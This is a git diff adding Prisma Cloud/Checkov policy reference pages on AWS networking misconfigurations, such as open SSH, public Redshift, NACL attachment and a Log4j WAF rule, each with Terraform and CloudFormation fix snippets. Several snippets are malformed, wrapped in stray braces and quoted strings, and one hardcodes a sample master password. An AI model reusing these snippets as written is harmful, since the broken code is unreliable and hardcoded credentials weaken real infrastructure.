https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/EIPAllocatedToVPCAttachedEC2.yaml[CKV2_AWS_19] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Ensure that an Elastic IP (EIP) is allocated for each NAT gateway that you want to deploy within your AWS account. +An EIP address is a static, public IP address designed for dynamic cloud computing. +You can associate an AWS EIP address with any EC2 instance, VPC ENI or NAT gateway. 
+A Network Address Translation (NAT) gateway is a device that enables EC2 instances in a private subnet to connect to the Internet while preventing the Internet from initiating a connection with those instances.
+With Elastic IPs, you can mask the failure of an EC2 instance by rapidly remapping the address to another instance launched in your VPC.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_eip, aws_instance
+* *Arguments:* _instance_ and _vpc_ of aws_eip
+
+
+[source,go]
+----
+resource "aws_eip" "ok_eip" {
+  instance = aws_instance.ec2.id
+  vpc      = true
+}
+
+
+resource "aws_instance" "ec2" {
+  ami               = "ami-21f78e11"
+  availability_zone = "us-west-2a"
+  instance_type     = "t2.micro"
+
+  tags = {
+    Name = "HelloWorld"
+  }
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-all-nacl-are-attached-to-subnets.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-all-nacl-are-attached-to-subnets.adoc
new file mode 100644
index 000000000..e7b20d0c8
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-all-nacl-are-attached-to-subnets.adoc
@@ -0,0 +1,72 @@
+== Not all NACL are attached to subnets
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 8eaf1a60-fe3f-4931-a8d4-fa8e84982f94
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SubnetHasACL.yaml[CKV2_AWS_1]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Network Access Control Lists (NACLs) are used to allow or deny traffic to and from subnets in a Virtual Private Cloud (VPC) in Amazon Web Services (AWS).
+It's important to ensure that all NACLs are attached to subnets because this allows you to set specific rules for controlling inbound and outbound traffic for those subnets.
+This can help to improve the security and connectivity of your VPC by allowing you to specify which traffic is allowed to enter or leave your subnets.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_vpc, aws_network_acl, aws_subnet
+* *Arguments:* _subnet_ids_ of aws_network_acl
+
+
+[source,go]
+----
+resource "aws_vpc" "ok_vpc" {
+  cidr_block = "10.0.0.0/16"
+}
+
+
+resource "aws_subnet" "main" {
+  vpc_id     = aws_vpc.ok_vpc.id
+  cidr_block = "10.0.1.0/24"
+}
+
+
+resource "aws_network_acl" "acl_ok" {
+  vpc_id     = aws_vpc.ok_vpc.id
+  subnet_ids = [aws_subnet.main.id]
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-amazon-emr-clusters-security-groups-are-not-open-to-the-world.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-amazon-emr-clusters-security-groups-are-not-open-to-the-world.adoc
new file mode 100644
index 000000000..48439895c
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-amazon-emr-clusters-security-groups-are-not-open-to-the-world.adoc
@@ -0,0 +1,81 @@
+== Amazon EMR clusters' security groups are open to the world
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| c1298129-c701-4548-8395-34043b3e0be5
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AMRClustersNotOpenToInternet.yaml[CKV2_AWS_7]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+It is generally a good security practice to ensure that the security groups for your Amazon EMR clusters are not open to the world, as this means that the clusters are only accessible from within your private network or from certain approved IP addresses or security groups.
+This can help to protect your EMR clusters from unauthorized access, as external parties will not be able to connect to them over the internet.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_emr_cluster and aws_security_group
+* *Arguments:* ingress of aws_security_group
+
+
+[source,go]
+----
+resource "aws_emr_cluster" "cluster_ok" {
+  name          = "emr-test-arn"
+  release_label = "emr-4.6.0"
+  applications  = ["Spark"]
+
+  ec2_attributes {
+    emr_managed_master_security_group = aws_security_group.block_access_ok.id
+    emr_managed_slave_security_group  = aws_security_group.block_access_ok.id
+    instance_profile                  = "connected_to_aws_iam_instance_profile"
+  }
+}
+
+resource "aws_security_group" "block_access_ok" {
+  name        = "block_access"
+  description = "Block all traffic"
+
+  ingress {
+    from_port   = 0
+    to_port     = 0
+    protocol    = "-1"
+    cidr_blocks = ["10.0.0.0/16"]
+  }
+
+
+  egress {
+    from_port   = 0
+    to_port     = 0
+    protocol    = "-1"
+    cidr_blocks = ["10.0.0.0/16"]
+  }
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-amazon-redshift-clusters-are-not-publicly-accessible.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-amazon-redshift-clusters-are-not-publicly-accessible.adoc
new file mode 100644
index 000000000..252d1141f
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-amazon-redshift-clusters-are-not-publicly-accessible.adoc
@@ -0,0 +1,32 @@
+== AWS Redshift cluster is publicly accessible
+
+
+=== Description
+
+We recommend you ensure your Amazon Redshift clusters are not publicly accessible.
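+A non-compliant cluster sets the attribute to true, or simply omits it (a minimal sketch with hypothetical names; note that publicly_accessible has historically defaulted to true in the Terraform AWS provider, so setting it explicitly is safest):
+
+[source,go]
+----
+# Non-compliant sketch: the cluster is reachable from the internet.
+resource "aws_redshift_cluster" "fail" {
+  cluster_identifier  = "tf-redshift-cluster"
+  node_type           = "dc1.large"
+
+  # Omitting this attribute can have the same effect, since the
+  # provider default has historically been true.
+  publicly_accessible = true
+}
+----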
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_redshift_cluster
+* *Arguments:* publicly_accessible
+
+
+[source,go]
+----
+resource "aws_redshift_cluster" "default" {
+  cluster_identifier = "tf-redshift-cluster"
+  database_name      = "mydb"
+  master_username    = "foo"
+  master_password    = "Mustbe8characters"
+  node_type          = "dc1.large"
+  cluster_type       = "single-node"
++ publicly_accessible = false
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-auto-scaling-groups-that-are-associated-with-a-load-balancer-are-using-elastic-load-balancing-health-checks.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-auto-scaling-groups-that-are-associated-with-a-load-balancer-are-using-elastic-load-balancing-health-checks.adoc
new file mode 100644
index 000000000..2899bbc6b
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-auto-scaling-groups-that-are-associated-with-a-load-balancer-are-using-elastic-load-balancing-health-checks.adoc
@@ -0,0 +1,117 @@
+== Auto scaling groups associated with a load balancer do not use elastic load balancing health checks
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| d26288c2-7208-4871-9109-fde0c6bae041
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/AutoScallingEnabledELB.yaml[CKV2_AWS_15]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+To maintain the availability of your compute resources in the event of a failure, and to provide an evenly distributed application load, ensure that your Amazon Auto Scaling Groups (ASGs) use Elastic Load Balancing health checks for the load balancers associated with them.
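+The essential pieces are the load balancer attachment and health_check_type = "ELB" on the group (a minimal sketch, hypothetical names):
+
+[source,go]
+----
+resource "aws_autoscaling_attachment" "sketch" {
+  autoscaling_group_name = aws_autoscaling_group.sketch.id
+  elb                    = aws_elb.sketch.id
+}
+
+resource "aws_autoscaling_group" "sketch" {
+  min_size          = 2
+  max_size          = 5
+  # "ELB" makes the group replace instances that fail load balancer
+  # health checks, not only EC2 status checks.
+  health_check_type = "ELB"
+}
+----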
+ +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_autoscaling_group, aws_autoscaling_attachment, aws_elb +* *Arguments:* _autoscaling_group_name_ and _elb_ of aws_autoscaling_attachment + + +[source,go] +---- +{ + "resource "aws_autoscaling_group" "autoscalling_ok" { + max_size = 5 + min_size = 2 + health_check_grace_period = 300 + health_check_type = "ELB" + desired_capacity = 4 + force_delete = true + + lifecycle { + ignore_changes = [load_balancers, target_group_arns] + } + +} + +resource "aws_autoscaling_attachment" "test_ok_attachment" { + autoscaling_group_name = aws_autoscaling_group.autoscalling_ok.id + elb = aws_elb.test_ok.id +} + + +resource "aws_elb" "test_ok" { + name = "foobar-terraform-elb" + availability_zones = ["us-west-2a", "us-west-2b", "us-west-2c"] + + access_logs { + bucket = "foo" + bucket_prefix = "bar" + interval = 60 + } + + + listener { + instance_port = 8000 + instance_protocol = "http" + lb_port = 80 + lb_protocol = "http" + } + + + listener { + instance_port = 8000 + instance_protocol = "http" + lb_port = 443 + lb_protocol = "https" + ssl_certificate_id = "arn:aws:iam::123456789012:server-certificate/certName" + } + + + health_check { + healthy_threshold = 2 + unhealthy_threshold = 2 + timeout = 3 + target = "HTTP:8000/" + interval = 30 + } + + + instances = [aws_instance.foo.id] + cross_zone_load_balancing = true + idle_timeout = 400 + connection_draining = true + connection_draining_timeout = 400 + + tags = { + Name = "foobar-terraform-elb" + } + +} + +", +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-direct-internet-access-is-disabled-for-an-amazon-sagemaker-notebook-instance.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-direct-internet-access-is-disabled-for-an-amazon-sagemaker-notebook-instance.adoc new file mode 100644 index 000000000..9dc74b4f1 --- /dev/null +++ 
b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-direct-internet-access-is-disabled-for-an-amazon-sagemaker-notebook-instance.adoc
@@ -0,0 +1,61 @@
+== AWS SageMaker notebook instance configured with direct internet access feature
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 5c0ba8b1-9b88-486f-9fe1-a0eb9071a42b
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SageMakerInternetAccessDisabled.py[CKV_AWS_122]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+We recommend that Direct Internet Access is *disabled* for your Amazon SageMaker Notebook Instances, so that notebook traffic is routed through your VPC.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_sagemaker_notebook_instance
+* *Arguments:* direct_internet_access
+
+
+[source,go]
+----
+resource "aws_sagemaker_notebook_instance" "test" {
+  name          = "my-notebook-instance"
+  role_arn      = aws_iam_role.role.arn
+  instance_type = "ml.t2.medium"
++ direct_internet_access = "Disabled"
+
+  tags = {
+    Name = "foo"
+  }
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-elasticsearch-is-configured-inside-a-vpc.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-elasticsearch-is-configured-inside-a-vpc.adoc
new file mode 100644
index 000000000..b603f1e06
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-elasticsearch-is-configured-inside-a-vpc.adoc
@@ -0,0 +1,69 @@
+== AWS Elasticsearch is not configured inside a VPC
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 02325f3d-6c35-4818-aa69-c09b8fb6e981
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticsearchInVPC.py[CKV_AWS_137]
+
+|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +AWS Elasticsearch domains that reside within a VPC have an extra layer of security when compared to ES domains that use public endpoints. +Launching an Amazon ES cluster within an AWS VPC enables secure communication between the ES cluster (domain) and other AWS services without the need for an Internet Gateway, a NAT device or a VPN connection and all traffic remains secure within the AWS Cloud. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_elasticsearch_domain +* *Arguments:* vpc_options + + +[source,go] +---- +{ + " resource "aws_elasticsearch_domain" "es" { + domain_name = var.domain + elasticsearch_version = "6.3" + + cluster_config { + instance_type = "m4.large.elasticsearch" + } + + ++ vpc_options { ++ subnet_ids = [ ++ data.aws_subnet_ids.selected.ids[0], ++ data.aws_subnet_ids.selected.ids[1], ++ ] + + security_group_ids = [aws_security_group.es.id] + } + + + }", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-elb-is-cross-zone-load-balancing-enabled.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-elb-is-cross-zone-load-balancing-enabled.adoc new file mode 100644 index 000000000..7b0faf270 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-elb-is-cross-zone-load-balancing-enabled.adoc @@ -0,0 +1,134 @@ +== AWS Elastic Load Balancer (Classic) with cross-zone load balancing disabled + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 551ee7ba-edb6-468e-a018-8774da9b1e85 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ELBCrossZoneEnable.py[CKV_AWS_138] + +|Severity +|MEDIUM + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Cross-zone 
load balancing reduces the need to maintain equivalent numbers of instances in each enabled Availability Zone, and improves your application's ability to handle the loss of one or more instances.
+This also provides better fault tolerance and more consistent traffic flow.
+If one of the availability zones registered with the ELB fails (as a result of a network outage or power loss), a load balancer with Cross-Zone Load Balancing activated acts as a traffic guard, stopping any request from being sent to the unhealthy zone and routing it to the other zones.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_elb
+* *Arguments:* cross_zone_load_balancing
+
+
+[source,go]
+----
+resource "aws_elb" "test_success" {
+  name               = "foobar-terraform-elb"
+  availability_zones = ["us-west-2a", "us-west-2b", "us-west-2c"]
+
+  access_logs {
+    bucket        = "foo"
+    bucket_prefix = "bar"
+    interval      = 60
+  }
+
+  listener {
+    instance_port     = 8000
+    instance_protocol = "http"
+    lb_port           = 80
+    lb_protocol       = "http"
+  }
+
+  listener {
+    instance_port      = 8000
+    instance_protocol  = "http"
+    lb_port            = 443
+    lb_protocol        = "https"
+    ssl_certificate_id = "arn:aws:iam::123456789012:server-certificate/certName"
+  }
+
+  health_check {
+    healthy_threshold   = 2
+    unhealthy_threshold = 2
+    timeout             = 3
+    target              = "HTTP:8000/"
+    interval            = 30
+  }
+
+  instances                   = [aws_instance.foo.id]
++ cross_zone_load_balancing   = true
+  idle_timeout                = 400
+  connection_draining         = true
+  connection_draining_timeout = 400
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-load-balancer-networkgateway-has-cross-zone-load-balancing-enabled.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-load-balancer-networkgateway-has-cross-zone-load-balancing-enabled.adoc
new file mode 100644
index 000000000..edcba705f
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-load-balancer-networkgateway-has-cross-zone-load-balancing-enabled.adoc
@@ -0,0 +1,54 @@
+== Load Balancer (Network/Gateway) does not have cross-zone load balancing enabled
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 33a49bf7-61f7-40c5-b604-ecd46dfb4094
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/LBCrossZone.py[CKV_AWS_152]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Cross-zone load balancing is a feature that distributes incoming traffic evenly across the healthy targets in all enabled availability zones.
+This can help to ensure that your application is able to handle more traffic, and reduces the risk of any single availability zone becoming overloaded, which could impact the load balancer's performance.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_lb
+* *Arguments:* enable_cross_zone_load_balancing
+
+
+[source,go]
+----
+resource "aws_lb" "enabled" {
+  ...
++ enable_cross_zone_load_balancing = true
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-security-groups-are-attached-to-ec2-instances-or-elastic-network-interfaces-enis.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-security-groups-are-attached-to-ec2-instances-or-elastic-network-interfaces-enis.adoc
new file mode 100644
index 000000000..72d191e6b
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-security-groups-are-attached-to-ec2-instances-or-elastic-network-interfaces-enis.adoc
@@ -0,0 +1,74 @@
+== Security Groups are not attached to EC2 instances or ENIs
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| df306deb-99ec-42d0-943b-f986854d7656
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/SGAttachedToResource.yaml[CKV2_AWS_5]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+Security groups are an important layer of security for Amazon EC2 instances and network interfaces (ENIs).
+They act as a virtual firewall for your instances, controlling inbound and outbound traffic to and from your instances.
+By attaching security groups to your EC2 instances or ENIs, you can specify which traffic is allowed to reach your instances, and which traffic is blocked.
+This can help to protect your instances from unauthorized access and prevent potential security vulnerabilities.
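+A security group that is declared but never referenced by any instance or network interface is what this policy flags; on current provider versions the attachment is usually made through vpc_security_group_ids (a sketch, hypothetical names and AMI ID):
+
+[source,go]
+----
+resource "aws_instance" "sketch" {
+  ami           = "ami-123456" # hypothetical AMI ID
+  instance_type = "t3.micro"
+
+  # Referencing the group here attaches it to the instance's primary ENI.
+  vpc_security_group_ids = [aws_security_group.sketch.id]
+}
+----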
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_network_interface, aws_instance, aws_security_group
+* *Arguments:* _security_groups_ of aws_instance or aws_security_group
+
+
+[source,go]
+----
+resource "aws_network_interface" "test" {
+  subnet_id       = aws_subnet.public_a.id
+  security_groups = [aws_security_group.ok_sg.id]
+}
+
+
+resource "aws_instance" "test" {
+  ami             = data.aws_ami.ubuntu.id
+  instance_type   = "t3.micro"
+  security_groups = [aws_security_group.ok_sg.id]
+}
+
+
+resource "aws_security_group" "ok_sg" {
+  ingress {
+    description = "TLS from VPC"
+    from_port   = 443
+    to_port     = 443
+    protocol    = "tcp"
+    cidr_blocks = ["0.0.0.0/0"]
+  }
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-vpc-endpoint-service-is-configured-for-manual-acceptance.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-vpc-endpoint-service-is-configured-for-manual-acceptance.adoc
new file mode 100644
index 000000000..99f40f09f
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-that-vpc-endpoint-service-is-configured-for-manual-acceptance.adoc
@@ -0,0 +1,69 @@
+== VPC endpoint service is not configured for manual acceptance
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 5eb67c68-44e9-49bb-b1bb-5f0a5511b124
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/VPCEndpointAcceptanceConfigured.py[CKV_AWS_123]
+
+|Severity
+|LOW
+
+|Subtype
+|Build
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+Configuring your VPC endpoint service for manual acceptance is recommended because it allows you to review and manually approve or reject incoming connection requests to your VPC.
+This can be useful for security purposes, as it gives you the ability to review and control which resources are able to connect to your VPC.
+By default, VPC endpoint services are configured for automatic acceptance, which means that all incoming connection requests are automatically accepted and allowed to connect to your VPC.
+Configuring your VPC endpoint service for manual acceptance allows you to review and selectively approve or reject incoming connection requests, giving you more control over who can access your VPC.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_vpc_endpoint_service
+* *Arguments:* acceptance_required
+
+
+[source,go]
+----
+resource "aws_vpc_endpoint_service" "example" {
+  ...
++ acceptance_required        = true
+  network_load_balancer_arns = [aws_lb.example.arn]
+}
+----
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::EC2::VPCEndpointService
+* *Arguments:* Properties.AcceptanceRequired
+
+
+[source,yaml]
+----
+Type: AWS::EC2::VPCEndpointService
+  Properties:
+    ...
++   AcceptanceRequired: true
+----
diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-transfer-server-is-not-exposed-publicly.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-transfer-server-is-not-exposed-publicly.adoc
new file mode 100644
index 000000000..40808c7cf
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-transfer-server-is-not-exposed-publicly.adoc
@@ -0,0 +1,69 @@
+== Transfer Server is exposed publicly
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 3eec109c-2e42-4875-bdfe-04b2a9999a7b
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/TransferServerIsPublic.py[CKV_AWS_164]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+By ensuring that your AWS Transfer Server is not public, you can help protect your data from unauthorized access or tampering.
+Public AWS Transfer Servers are accessible over the internet, which can make them vulnerable to external threats such as hackers or malware.
+By making the server private, you can help ensure that only authorized users can access the data.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_transfer_server
+* *Arguments:* endpoint_type
+
+
+[source,go]
+----
+resource "aws_transfer_server" "test" {
+
+  endpoint_type = "VPC"
+  protocols     = ["SFTP"]
+}
+----
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::Transfer::Server
+* *Arguments:* Properties.EndpointType
+
+
+[source,yaml]
+----
+Resources:
+  VPC:
+    Type: AWS::Transfer::Server
+    Properties:
+      ...
++     EndpointType: "VPC" # or "VPC_ENDPOINT"
+----
diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-vpc-subnets-do-not-assign-public-ip-by-default.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-vpc-subnets-do-not-assign-public-ip-by-default.adoc
new file mode 100644
index 000000000..b040108c8
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-vpc-subnets-do-not-assign-public-ip-by-default.adoc
@@ -0,0 +1,56 @@
+== AWS VPC subnets should not allow automatic public IP assignment
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| 11743cd3-35e4-4639-91e1-bc87b52d4cf5
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SubnetPublicIP.py[CKV_AWS_130]
+
+|Severity
+|MEDIUM
+
+|Subtype
+|Build
+//, Run
+
+|Frameworks
+|Terraform,TerraformPlan
+
+|===
+
+
+
+=== Description
+
+
+A VPC subnet is a part of the VPC that has its own rules for traffic.
+Automatically assigning a public IP to the subnet's instances (on launch) can accidentally expose the instances within this subnet to the internet; the setting should be edited to 'No' after creation of the subnet.
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_subnet
+* *Arguments:* map_public_ip_on_launch
+
+
+[source,go]
+----
+resource "aws_subnet" "test" {
+  ...
++ map_public_ip_on_launch = false
+}
+----
diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-waf-prevents-message-lookup-in-log4j2.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-waf-prevents-message-lookup-in-log4j2.adoc
new file mode 100644
index 000000000..ff48100ff
--- /dev/null
+++ b/code-security/policy-reference/aws-policies/aws-networking-policies/ensure-waf-prevents-message-lookup-in-log4j2.adoc
@@ -0,0 +1,104 @@
+== WAF enables message lookup in Log4j2
+
+
+=== Policy Details
+
+[width=45%]
+[cols="1,1"]
+|===
+|Prisma Cloud Policy ID
+| da1c5426-e898-4eac-99d5-a5a45b6e4e6d
+
+|Checkov Check ID
+| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py[CKV_AWS_192]
+
+|Severity
+|HIGH
+
+|Subtype
+|Build
+
+|Frameworks
+|CloudFormation,Terraform,TerraformPlan,Serverless
+
+|===
+
+
+
+=== Description
+
+
+Using a vulnerable version of the Apache Log4j library might enable attackers to exploit a Lookup mechanism that supports making requests using special syntax in a format string, which can potentially lead to risky code execution, data leakage and more.
+Set your Web Application Firewall (WAF) to prevent this mechanism from executing, using the rule definition below.
+Learn more at https://nvd.nist.gov/vuln/detail/CVE-2021-44228[CVE-2021-44228]
+
+=== Fix - Buildtime
+
+
+*Terraform*
+
+
+* *Resource:* aws_wafv2_web_acl
+
+
+[source,go]
+----
+resource "aws_wafv2_web_acl" "pass" {
+  ...
+
+  rule {
+    name     = "AWS-AWSManagedRulesKnownBadInputsRuleSet"
+    priority = 1
+
+    override_action {
+      none {}
+    }
+
+    statement {
+      managed_rule_group_statement {
+        name        = "AWSManagedRulesKnownBadInputsRuleSet"
+        vendor_name = "AWS"
+      }
+    }
+
+    ...
+  }
+
+  ...
+}
+----
+
+
+*CloudFormation*
+
+
+* *Resource:* AWS::WAFv2::WebACL
+
+
+[source,text]
+----
+{
+ "Pass:
+ Type: AWS::WAFv2::WebACL
+ Properties:
+ ...
+ + Rules: + - Name: AWS-AWSManagedRulesKnownBadInputsRuleSet + Priority: 1 + Statement: + ManagedRuleGroupStatement: + VendorName: AWS + Name: AWSManagedRulesKnownBadInputsRuleSet + OverrideAction: + None: {} + ...", + +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-networking-policies/networking-1-port-security.adoc b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-1-port-security.adoc new file mode 100644 index 000000000..a6b3a3c54 --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-networking-policies/networking-1-port-security.adoc @@ -0,0 +1,145 @@ +== AWS Security Group allows all traffic on SSH port (22) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 617b9138-584b-4e8e-ad15-7fbabafbed1a + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress22.py[CKV_AWS_24] + +|Severity +|LOW + +|Subtype +|Build +//, Run + +|Frameworks +|CloudFormation,Terraform,TerraformPlan,Serverless + +|=== + + + +=== Description + + +Security groups are stateful and provide filtering of ingress/egress network traffic to AWS resources. +We recommend that security groups do not allow unrestricted ingress access to port 22. +Removing unfettered connectivity to remote console services, such as SSH, reduces a server's exposure to risk. + +//// +=== Fix - Runtime + + +* AWS Console* + + +To implement the prescribed state, follow these steps: + +. Log in to the AWS Management Console at https://console.aws.amazon.com/. + +. Open the https://console.aws.amazon.com/vpc/ [Amazon VPC console]. + +. In the left pane, click * Security Groups*. + +. For each security group, perform the following: a) Select the _security group_. ++ +b) Click * Inbound Rules*. ++ +c) Identify the rules to be removed. ++ +d) Click * X* in the Remove column. + +. Click * Save*. + + +* CLI Command* + + + +. 
Review the rules for an existing security group (replacing the security group ID and region):
++
+
+[source,shell]
+----
+aws ec2 describe-security-groups \
+  --group-ids sg-xxxxxxxxxxxxxxxxx \
+  --region us-east-1
+----
+
+. Review any EC2 instances using the security group:
++
+
+[source,shell]
+----
+aws ec2 describe-instances \
+  --filters Name=instance.group-id,Values=sg-xxxxxxxxxxxxxxxxx \
+  --region us-east-1
+----
+////
+
+=== Fix - Buildtime
+
+*Terraform*
+
+* *Resource:* aws_security_group
+
+[source,go]
+----
+resource "aws_security_group" "example" {
+  ...
+  ingress {
+    cidr_blocks = [
+-     "0.0.0.0/0"
++     "10.0.0.1/32"
+    ]
+    from_port = 22
+    to_port   = 22
+    protocol  = "tcp"
+  }
+}
+----
+
+*CloudFormation*
+
+* *Resource:* AWS::EC2::SecurityGroup
+* *Arguments:* Properties.SecurityGroupIngress
+
+[source,yaml]
+----
+Type: AWS::EC2::SecurityGroup
+Properties:
+  ...
+  SecurityGroupIngress:
+    - Description: SSH Ingress
+      IpProtocol: tcp
+      FromPort: 22
+      ToPort: 22
+-     CidrIp: "0.0.0.0/0"
++     CidrIp: "10.10.10.0/24"
+----
